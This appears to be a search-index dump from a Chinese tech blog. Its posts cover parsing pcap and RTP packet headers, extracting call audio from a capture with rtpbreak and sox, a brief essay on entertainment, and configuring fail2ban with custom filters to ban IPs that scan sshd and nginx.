data部分的数据之后。参考frame的格式。一般Peramble字段部分是没有的。所以我们可以把包的总长度减去14字节之后,拿到User Data部分的数据。\n其中Type/Length部分可以说明上层运载的是什么协议的包,比较常见的是0x0800表示上层是IPv4, 0x86dd表示上层是IPv6\n0 - 1500 length field (IEEE 802.3 and/or 802.2) 0x0800 IP(v4), Internet Protocol version 4 0x0806 ARP, Address Resolution Protocol 0x8137 IPX, Internet Packet eXchange (Novell) 0x86dd IPv6, Internet Protocol version 6 802.3的详情可以参考 https://wiki.wireshark.org/Ethernet?action=show\u0026amp;redirect=Protocols%2Feth\nIP包的封装格式 如何计算IP数据部分的长度呢?需要知道两个字段的值。\nTotol Length: IP数据报的总长度,单位是字节 IHL: IP数据报头部的总长度,单位是4字节。IHL比较常见的值是5,则说命名IP数据头部的长度是20字节。IHL占4位,最大是15,所以IP头的最大长度是60字节(15 * 4) data部分的字节长度 = Total Length - IHL * 4\nTCP包的封装格式 UDP包的封装格式 UDP包的头部是定长的8个字节。数据部分的长度 = 总长度 - 8\nRTP包的封装格式 RTP包的数据部分长度 = 总长度 - 12\nPT部分表示编码格式,例如常见的PCMU是0,\nRTP详情 https://www.ietf.org/rfc/rfc3550.txtRTP数据体类型编码表参考 https://www.ietf.org/rfc/rfc3551.txt\n参考 http://www.tcpdump.org/linktypes.html https://wiki.wireshark.org/Development/LibpcapFileFormat ","permalink":"https://wdd.js.org/network/gzskun/","summary":"介绍 之所以要写这篇文章,是因为我要从pcap格式的抓包文件中抽取出语音文件。之间虽然对tcp协议有不错的理解,但并没有写代码去真正的解包分析。\n最近用Node.js尝试去pacp文件中成功提取出了语音文件。再次做个总结。\n预备知识 字节序: 关于字节序,可以参考 https://www.ruanyifeng.com/blog/2016/11/byte-order.html。读取的时候,如果字节序设置错了,就会读出来一堆无法解析的内容 PCAP格式 下面是paap文件的格式。\n开局是一个全局的头文件。后续跟着一系列的包头和包体。\nGlobal Header格式 全局头由六个字段组成,加起来一共24个字节。\ntypedef struct pcap_hdr_s { guint32 magic_number; /* magic number */ guint16 version_major; /* major version number */ guint16 version_minor; /* minor version number */ gint32 thiszone; /* GMT to local correction */ guint32 sigfigs; /* accuracy of timestamps */ guint32 snaplen; /* max length of captured packets, in octets */ guint32 network; /* data link type */ } pcap_hdr_t; magic_number 魔术字符,32位无符号整型,一般是0xa1b2c3d4或者0xd4c3b2a1,前者表示字段要按照大端字节序来读取,后者表示字段要按照小段字节序来读取。 version_major 大版本号,16位无符号整形。一般是2 version_minor 小版本号,16位无符号整形。一般是4 thiszone 时区 sigfigs 实际时间戳 snaplen 捕获的最大的长度 network 数据链路层的类型。参考http://www.","title":"网络拆包笔记"},{"content":"wireshark具有这个功能,但是并不适合做批量执行。\n下面的方案比较适合批量执行。\n# 1. 安装依赖 yum install gcc libpcap-devel libnet-devel sox -y # 2. 克隆源码 git clone https://github.com/wangduanduan/rtpsplit.git # 3. 切换目录 cd rtpsplit # 4. 编译可执行文件 make # 5. 将可执行文件复制到/usr/local/bin目录下 cp src/rtpbreak /usr/local/bin # 6. 切换到录音文件的目录,假如当前目录只有一个文件 rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ audio git:(edge) ✗ rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ + rtpbreak v1.3a running here! + pid: 1885, date/time: 01/05/2020#09:49:05 + Configuration + INPUT Packet source: rxfile \u0026#39;krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap\u0026#39; Force datalink header length: disabled + OUTPUT Output directory: \u0026#39;./\u0026#39; RTP raw dumps: enabled RTP pcap dumps: enabled Fill gaps: enabled Dump noise: disabled Logfile: \u0026#39;.//rtp.0.txt\u0026#39; Logging to stdout: enabled Logging to syslog: disabled Be verbose: disabled + SELECT Sniff packets in promisc mode: enabled Add pcap filter: disabled Expecting even destination UDP port: disabled Expecting unprivileged source/destination UDP ports: disabled Expecting RTP payload type: any Expecting RTP payload length: any Packet timeout: 10.00 seconds Pattern timeout: 0.25 seconds Pattern packets: 5 + EXECUTION Running as user/group: root/root Running daemonized: disabled * You can dump stats sending me a SIGUSR2 signal * Reading packets... open di .//rtp.0.0.txt ! [rtp0] detected: pt=0(g711U) 192.168.40.192:26396 =\u0026gt; 192.168.60.229:20000 open di .//rtp.0.1.txt ! [rtp1] detected: pt=0(g711U) 10.197.169.10:49265 =\u0026gt; 192.168.60.229:20012 * eof reached. -- Caught SIGTERM signal (15), cleaning up... -- * [rtp1] closed: packets inbuffer=0 flushed=285 lost=0(0.00%), call_length=0m12s * [rtp0] closed: packets inbuffer=0 flushed=586 lost=0(0.00%), call_length=0m12s + Status Alive RTP Sessions: 0 Closed RTP Sessions: 2 Detected RTP Sessions: 2 Flushed RTP packets: 871 Lost RTP packets: 0 (0.00%) Noise (false positive) packets: 8 + No active RTP streams # 7. 查看输出文件 -rw-r--r--. 1 root root 185K May 1 09:22 krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -rw-r--r--. 1 root root 132K May 1 09:49 rtp.0.0.pcap -rw-r--r--. 1 root root 92K May 1 09:49 rtp.0.0.raw -rw-r--r--. 1 root root 412 May 1 09:49 rtp.0.0.txt -rw-r--r--. 1 root root 52K May 1 09:49 rtp.0.1.pcap -rw-r--r--. 1 root root 33K May 1 09:49 rtp.0.1.raw -rw-r--r--. 1 root root 435 May 1 09:49 rtp.0.1.txt -rw-r--r--. 1 root root 1.7K May 1 09:49 rtp.0.txt # 8. 使用sox 转码以及合成wav文件 sox -r8000 -c1 -t ul rtp.0.0.raw -t wav 0.wav sox -r8000 -c1 -t ul rtp.0.1.raw -t wav 1.wav sox -m 0.wav 1.wav call.wav # 最终合成的 call.wav文件,就是可以放到浏览器中播放的双声道语音文件 参考 rtpbreak帮助文档 Copyright (c) 2007-2008 Dallachiesa Michele \u0026lt;micheleDOTdallachiesaATposteDOTit\u0026gt; rtpbreak v1.3a is free software, covered by the GNU General Public License. USAGE: rtpbreak (-r|-i) \u0026lt;source\u0026gt; [options] INPUT -r \u0026lt;str\u0026gt; Read packets from pcap file \u0026lt;str\u0026gt; -i \u0026lt;str\u0026gt; Read packets from network interface \u0026lt;str\u0026gt; -L \u0026lt;int\u0026gt; Force datalink header length == \u0026lt;int\u0026gt; bytes OUTPUT -d \u0026lt;str\u0026gt; Set output directory to \u0026lt;str\u0026gt; (def:.) -w Disable RTP raw dumps -W Disable RTP pcap dumps -g Fill gaps in RTP raw dumps (caused by lost packets) -n Dump noise packets -f Disable stdout logging -F Enable syslog logging -v Be verbose SELECT -m Sniff packets in promisc mode -p \u0026lt;str\u0026gt; Add pcap filter \u0026lt;str\u0026gt; -e Expect even destination UDP port -u Expect unprivileged source/destination UDP ports (\u0026gt;1024) -y \u0026lt;int\u0026gt; Expect RTP payload type == \u0026lt;int\u0026gt; -l \u0026lt;int\u0026gt; Expect RTP payload length == \u0026lt;int\u0026gt; bytes -t \u0026lt;float\u0026gt; Set packet timeout to \u0026lt;float\u0026gt; seconds (def:10.00) -T \u0026lt;float\u0026gt; Set pattern timeout to \u0026lt;float\u0026gt; seconds (def:0.25) -P \u0026lt;int\u0026gt; Set pattern packets count to \u0026lt;int\u0026gt; (def:5) EXECUTION -Z \u0026lt;str\u0026gt; Run as user \u0026lt;str\u0026gt; -D Run in background (option -f implicit) MISC -k List known RTP payload types -h This ","permalink":"https://wdd.js.org/posts/2020/05/fosfbg/","summary":"wireshark具有这个功能,但是并不适合做批量执行。\n下面的方案比较适合批量执行。\n# 1. 安装依赖 yum install gcc libpcap-devel libnet-devel sox -y # 2. 克隆源码 git clone https://github.com/wangduanduan/rtpsplit.git # 3. 切换目录 cd rtpsplit # 4. 编译可执行文件 make # 5. 将可执行文件复制到/usr/local/bin目录下 cp src/rtpbreak /usr/local/bin # 6. 切换到录音文件的目录,假如当前目录只有一个文件 rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ audio git:(edge) ✗ rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ + rtpbreak v1.3a running here! + pid: 1885, date/time: 01/05/2020#09:49:05 + Configuration + INPUT Packet source: rxfile \u0026#39;krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.","title":"从pcap文件提取转wav语音文件"},{"content":"娱乐至死,娱乐也能让人变得智障。\n贪图于精神愉悦,在永无休止的欢悦中难以自拔。\n道德经上写道:五色令人目盲,五音令人耳聋,五味令人口爽,驰骋田猎令人心发狂。\n现代人尤其如此。买分辨率最高的显示器,刷新频率最高的手机,买最贵的耳机,吃口味最为劲爆的火锅。\n感觉人都已经被五官所控制,变成了一个行尸走肉的躯壳。\n但是话又说回来,人为什么要这要麻痹自己呢?\n或许变成一个智障,才能稍微从现实的夹缝中稍微缓口气。\n冷风如刀,以大地为砧板,视众生皆为鱼肉。\n","permalink":"https://wdd.js.org/posts/2020/04/uffptn/","summary":"娱乐至死,娱乐也能让人变得智障。\n贪图于精神愉悦,在永无休止的欢悦中难以自拔。\n道德经上写道:五色令人目盲,五音令人耳聋,五味令人口爽,驰骋田猎令人心发狂。\n现代人尤其如此。买分辨率最高的显示器,刷新频率最高的手机,买最贵的耳机,吃口味最为劲爆的火锅。\n感觉人都已经被五官所控制,变成了一个行尸走肉的躯壳。\n但是话又说回来,人为什么要这要麻痹自己呢?\n或许变成一个智障,才能稍微从现实的夹缝中稍微缓口气。\n冷风如刀,以大地为砧板,视众生皆为鱼肉。","title":"娱乐智障"},{"content":"简介 如果你的主机在公网上有端口暴露出去,那么总会有一些不怀好意的家伙,会尝试通过各种方式攻击你的机器。常见的服务例如ssh, nginx都会有类似的威胁。\n手工将某个ip加入黑名单,这种操作太麻烦,而且效率低。而fail2ban就是一种自动化的解决方案。\nfail2ban工作原理 fail2ban的工作原理是监控某个日志文件,然后根据某些关键词,提取出攻击方的IP地址,然后将其加入到黑名单。\nfail2ban安装 yum install fail2ban -y # 如果找不到fail2ban包,就执行下面的命令 yum install epel-release # 安装fail2ban 完成后 systemctl enable fail2ban # 设置fail2ban开机启动 systemctl start fail2ban # 启动fail2ban systemctl status fail2ban # 查看fail2ban的运行状态 用fail2ban保护ssh fail2ban的配置文件位于/etc/fail2ban目录下。\n在该目录下建立一个文件 jail.local, 内容如下\nbantime 持续禁止多久 maxretry 最大多少次尝试 banaction 拦截后的操作 findtime 查找时间 看下下面的操作的意思是:监控sshd服务的最近10分钟的日志,如果某个ip在10分钟之内,有2次登录失败,就把这个ip加入黑名单, 24小时之后,这个ip才会被从黑名单中移除。\n[DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true 然后重启fail2ban, systemctl restart fail2ban fail2ban提供管理工具fail2ban-client\n**fail2ban-client status **显示fail2ban的状态 **fail2ban-client status sshd **显示某个监狱的配置。从下文的输出来看可以看出来fail2ban已经拦截了一些IP地址了 \u0026gt; fail2ban-client status Status |- Number of jail:\t1 `- Jail list:\tsshd \u0026gt; fail2ban-client status sshd Status for the jail: sshd |- Filter | |- Currently failed:\t2 | |- Total failed:\t23289 | `- Journal matches:\t_SYSTEMD_UNIT=sshd.service + _COMM=sshd `- Actions |- Currently banned:\t9 |- Total banned:\t1270 `- Banned IP list:\t93.174.93.10 165.22.238.92 23.231.25.234 134.255.219.207 77.202.192.113 120.224.47.86 144.91.70.139 90.3.194.84 217.182.89.87 fail2ban保护sshd的原理 fail2ban的配置文件目录下有个filter.d目录,该目录下有个sshd.conf的文件,这个文件就是对于sshd日志的过滤规则,里面有些正常时用来提取出恶意家伙的IP地址。\n配置配置文件很长,我们只看其中一段, 其中**\u0026lt;****HOST\u0026gt;**是个非常重要的关键词,是用来提取出远程的IP地址的。\ncmnfailre = ^[aA]uthentication (?:failure|error|failed) for \u0026lt;F-USER\u0026gt;.*\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;( via \\S+)?%(__suff)s$ ^User not known to the underlying authentication module for \u0026lt;F-USER\u0026gt;.*\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;%(__suff)s$ ^Failed publickey for invalid user \u0026lt;F-USER\u0026gt;(?P\u0026lt;cond_user\u0026gt;\\S+)|(?:(?! from ).)*?\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;%(__on_port_opt)s(?: ssh\\d*)?(?(cond_us 实战:如何自定义一个过滤规则 我的nginx服务器,几乎每隔2-3秒就会收到下面的一个请求。\n下面我就写个过滤规则,将类似请求的IP加入黑名单。\n165.22.225.238 - - [28/Apr/2020:08:19:38 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:22:48 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:24:08 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:25:45 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:28:01 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; step1: 分析日志规则 165.22.225.238 - - [28/Apr/2020:08:19:38 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; HOST - - .*\u0026#34; 502 .* step2: 写规则文件 在filter.d目录下新建文件 banit.conf\n[INCLUDES] [Definition] failregex = \u0026lt;HOST\u0026gt; - - .*\u0026#34; 502 .* ignoreregex = step3: 修改jail.local [DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true [banit] enabled = true action = iptables-allports[name=banit, protocol=all] logpath = /var/log/nginx/access.log step4: 重启fail2ban fail2ban-client restart**\nstep5: 查看效果 可以看出banit的这个监狱,已经加入了一个165.22.225.238这个ip,这个流氓不会在骚扰我们的主机了。\n\u0026gt; fail2ban fail2ban-client status banit Status for the jail: banit |- Filter | |- Currently failed:\t1 | |- Total failed:\t5 | `- File list:\t/var/log/nginx/access.log `- Actions |- Currently banned:\t1 |- Total banned:\t1 `- Banned IP list:\t165.22.225.238 **\nfail2ban-client 常用操作 重启: **fail2ban systemctl restart fail2ban ** 查看fail2ban opensips运行状态: **fail2ban-client status opensips ** 黑名单操作 (注意,黑名单测试时,不要把自己的IP加到黑名单里做测试,否则就连不上机器了) IP加入黑名单:**fail2ban-client set opensips banip 192.168.1.8 ** IP解锁:fail2ban-client set opensips unbanip 192.168.1.8 白名单操作 IP加入白名单:fail2ban-client set opensips addignoreip 192.168.1.8 IP从白名单中移除:fail2ban-client set opensips delignoreip 192.168.1.8 在所有监狱中加入IP白名单:fail2ban-clien unban 192.168.1.8 fail2ban的拦截是基于jail, 如果一个ip在某个jail中,但是不在其他jail中,那么这个ip也是无法访问主机。如果想在所有jail中加入一个白名单,需要fail2ban-client unban ip。\n**\nfail2ban-client帮助文档 Usage: fail2ban-client [OPTIONS] \u0026lt;COMMAND\u0026gt; Fail2Ban v0.10.5 reads log file that contains password failure report and bans the corresponding IP addresses using firewall rules. Options: -c \u0026lt;DIR\u0026gt; configuration directory -s \u0026lt;FILE\u0026gt; socket path -p \u0026lt;FILE\u0026gt; pidfile path --loglevel \u0026lt;LEVEL\u0026gt; logging level --logtarget \u0026lt;TARGET\u0026gt; logging target, use file-name or stdout, stderr, syslog or sysout. --syslogsocket auto|\u0026lt;FILE\u0026gt; -d dump configuration. For debugging --dp, --dump-pretty dump the configuration using more human readable representation -t, --test test configuration (can be also specified with start parameters) -i interactive mode -v increase verbosity -q decrease verbosity -x force execution of the server (remove socket file) -b start server in background (default) -f start server in foreground --async start server in async mode (for internal usage only, don\u0026#39;t read configuration) --timeout timeout to wait for the server (for internal usage only, don\u0026#39;t read configuration) --str2sec \u0026lt;STRING\u0026gt; convert time abbreviation format to seconds -h, --help display this help message -V, --version print the version (-V returns machine-readable short format) Command: BASIC start starts the server and the jails restart restarts the server restart [--unban] [--if-exists] \u0026lt;JAIL\u0026gt; restarts the jail \u0026lt;JAIL\u0026gt; (alias for \u0026#39;reload --restart ... \u0026lt;JAIL\u0026gt;\u0026#39;) reload [--restart] [--unban] [--all] reloads the configuration without restarting of the server, the option \u0026#39;--restart\u0026#39; activates completely restarting of affected jails, thereby can unban IP addresses (if option \u0026#39;--unban\u0026#39; specified) reload [--restart] [--unban] [--if-exists] \u0026lt;JAIL\u0026gt; reloads the jail \u0026lt;JAIL\u0026gt;, or restarts it (if option \u0026#39;--restart\u0026#39; specified) stop stops all jails and terminate the server unban --all unbans all IP addresses (in all jails and database) unban \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; unbans \u0026lt;IP\u0026gt; (in all jails and database) status gets the current status of the server ping tests if the server is alive echo for internal usage, returns back and outputs a given string help return this output version return the server version LOGGING set loglevel \u0026lt;LEVEL\u0026gt; sets logging level to \u0026lt;LEVEL\u0026gt;. Levels: CRITICAL, ERROR, WARNING, NOTICE, INFO, DEBUG, TRACEDEBUG, HEAVYDEBUG or corresponding numeric value (50-5) get loglevel gets the logging level set logtarget \u0026lt;TARGET\u0026gt; sets logging target to \u0026lt;TARGET\u0026gt;. Can be STDOUT, STDERR, SYSLOG or a file get logtarget gets logging target set syslogsocket auto|\u0026lt;SOCKET\u0026gt; sets the syslog socket path to auto or \u0026lt;SOCKET\u0026gt;. Only used if logtarget is SYSLOG get syslogsocket gets syslog socket path flushlogs flushes the logtarget if a file and reopens it. For log rotation. DATABASE set dbfile \u0026lt;FILE\u0026gt; set the location of fail2ban persistent datastore. Set to \u0026#34;None\u0026#34; to disable get dbfile get the location of fail2ban persistent datastore set dbmaxmatches \u0026lt;INT\u0026gt; sets the max number of matches stored in database per ticket get dbmaxmatches gets the max number of matches stored in database per ticket set dbpurgeage \u0026lt;SECONDS\u0026gt; sets the max age in \u0026lt;SECONDS\u0026gt; that history of bans will be kept get dbpurgeage gets the max age in seconds that history of bans will be kept JAIL CONTROL add \u0026lt;JAIL\u0026gt; \u0026lt;BACKEND\u0026gt; creates \u0026lt;JAIL\u0026gt; using \u0026lt;BACKEND\u0026gt; start \u0026lt;JAIL\u0026gt; starts the jail \u0026lt;JAIL\u0026gt; stop \u0026lt;JAIL\u0026gt; stops the jail \u0026lt;JAIL\u0026gt;. The jail is removed status \u0026lt;JAIL\u0026gt; [FLAVOR] gets the current status of \u0026lt;JAIL\u0026gt;, with optional flavor or extended info JAIL CONFIGURATION set \u0026lt;JAIL\u0026gt; idle on|off sets the idle state of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignoreself true|false allows the ignoring of own IP addresses set \u0026lt;JAIL\u0026gt; addignoreip \u0026lt;IP\u0026gt; adds \u0026lt;IP\u0026gt; to the ignore list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delignoreip \u0026lt;IP\u0026gt; removes \u0026lt;IP\u0026gt; from the ignore list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignorecommand \u0026lt;VALUE\u0026gt; sets ignorecommand of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignorecache \u0026lt;VALUE\u0026gt; sets ignorecache of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addlogpath \u0026lt;FILE\u0026gt; [\u0026#39;tail\u0026#39;] adds \u0026lt;FILE\u0026gt; to the monitoring list of \u0026lt;JAIL\u0026gt;, optionally starting at the \u0026#39;tail\u0026#39; of the file (default \u0026#39;head\u0026#39;). set \u0026lt;JAIL\u0026gt; dellogpath \u0026lt;FILE\u0026gt; removes \u0026lt;FILE\u0026gt; from the monitoring list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; logencoding \u0026lt;ENCODING\u0026gt; sets the \u0026lt;ENCODING\u0026gt; of the log files for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addjournalmatch \u0026lt;MATCH\u0026gt; adds \u0026lt;MATCH\u0026gt; to the journal filter of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; deljournalmatch \u0026lt;MATCH\u0026gt; removes \u0026lt;MATCH\u0026gt; from the journal filter of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addfailregex \u0026lt;REGEX\u0026gt; adds the regular expression \u0026lt;REGEX\u0026gt; which must match failures for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delfailregex \u0026lt;INDEX\u0026gt; removes the regular expression at \u0026lt;INDEX\u0026gt; for failregex set \u0026lt;JAIL\u0026gt; addignoreregex \u0026lt;REGEX\u0026gt; adds the regular expression \u0026lt;REGEX\u0026gt; which should match pattern to exclude for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delignoreregex \u0026lt;INDEX\u0026gt; removes the regular expression at \u0026lt;INDEX\u0026gt; for ignoreregex set \u0026lt;JAIL\u0026gt; findtime \u0026lt;TIME\u0026gt; sets the number of seconds \u0026lt;TIME\u0026gt; for which the filter will look back for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; bantime \u0026lt;TIME\u0026gt; sets the number of seconds \u0026lt;TIME\u0026gt; a host will be banned for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; datepattern \u0026lt;PATTERN\u0026gt; sets the \u0026lt;PATTERN\u0026gt; used to match date/times for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; usedns \u0026lt;VALUE\u0026gt; sets the usedns mode for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; attempt \u0026lt;IP\u0026gt; [\u0026lt;failure1\u0026gt; ... \u0026lt;failureN\u0026gt;] manually notify about \u0026lt;IP\u0026gt; failure set \u0026lt;JAIL\u0026gt; banip \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; manually Ban \u0026lt;IP\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; unbanip [--report-absent] \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; manually Unban \u0026lt;IP\u0026gt; in \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxretry \u0026lt;RETRY\u0026gt; sets the number of failures \u0026lt;RETRY\u0026gt; before banning the host for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxmatches \u0026lt;INT\u0026gt; sets the max number of matches stored in memory per ticket in \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxlines \u0026lt;LINES\u0026gt; sets the number of \u0026lt;LINES\u0026gt; to buffer for regex search for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addaction \u0026lt;ACT\u0026gt;[ \u0026lt;PYTHONFILE\u0026gt; \u0026lt;JSONKWARGS\u0026gt;] adds a new action named \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt;. Optionally for a Python based action, a \u0026lt;PYTHONFILE\u0026gt; and \u0026lt;JSONKWARGS\u0026gt; can be specified, else will be a Command Action set \u0026lt;JAIL\u0026gt; delaction \u0026lt;ACT\u0026gt; removes the action \u0026lt;ACT\u0026gt; from \u0026lt;JAIL\u0026gt; COMMAND ACTION CONFIGURATION set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstart \u0026lt;CMD\u0026gt; sets the start command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstop \u0026lt;CMD\u0026gt; sets the stop command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actioncheck \u0026lt;CMD\u0026gt; sets the check command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionban \u0026lt;CMD\u0026gt; sets the ban command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionunban \u0026lt;CMD\u0026gt; sets the unban command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; timeout \u0026lt;TIMEOUT\u0026gt; sets \u0026lt;TIMEOUT\u0026gt; as the command timeout in seconds for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; GENERAL ACTION CONFIGURATION set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;PROPERTY\u0026gt; \u0026lt;VALUE\u0026gt; sets the \u0026lt;VALUE\u0026gt; of \u0026lt;PROPERTY\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;METHOD\u0026gt;[ \u0026lt;JSONKWARGS\u0026gt;] calls the \u0026lt;METHOD\u0026gt; with \u0026lt;JSONKWARGS\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; JAIL INFORMATION get \u0026lt;JAIL\u0026gt; logpath gets the list of the monitored files for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; logencoding gets the encoding of the log files for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; journalmatch gets the journal filter match for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignoreself gets the current value of the ignoring the own IP addresses get \u0026lt;JAIL\u0026gt; ignoreip gets the list of ignored IP addresses for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignorecommand gets ignorecommand of \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; failregex gets the list of regular expressions which matches the failures for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignoreregex gets the list of regular expressions which matches patterns to ignore for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; findtime gets the time for which the filter will look back for failures for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; bantime gets the time a host is banned for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; datepattern gets the patern used to match date/times for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; usedns gets the usedns setting for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxretry gets the number of failures allowed for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxmatches gets the max number of matches stored in memory per ticket in \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxlines gets the number of lines to buffer for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; actions gets a list of actions for \u0026lt;JAIL\u0026gt; COMMAND ACTION INFORMATION get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstart gets the start command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstop gets the stop command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actioncheck gets the check command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionban gets the ban command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionunban gets the unban command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; timeout gets the command timeout in seconds for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; GENERAL ACTION INFORMATION get \u0026lt;JAIL\u0026gt; actionproperties \u0026lt;ACT\u0026gt; gets a list of properties for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; actionmethods \u0026lt;ACT\u0026gt; gets a list of methods for the action \u0026lt;ACT\u0026gt; for 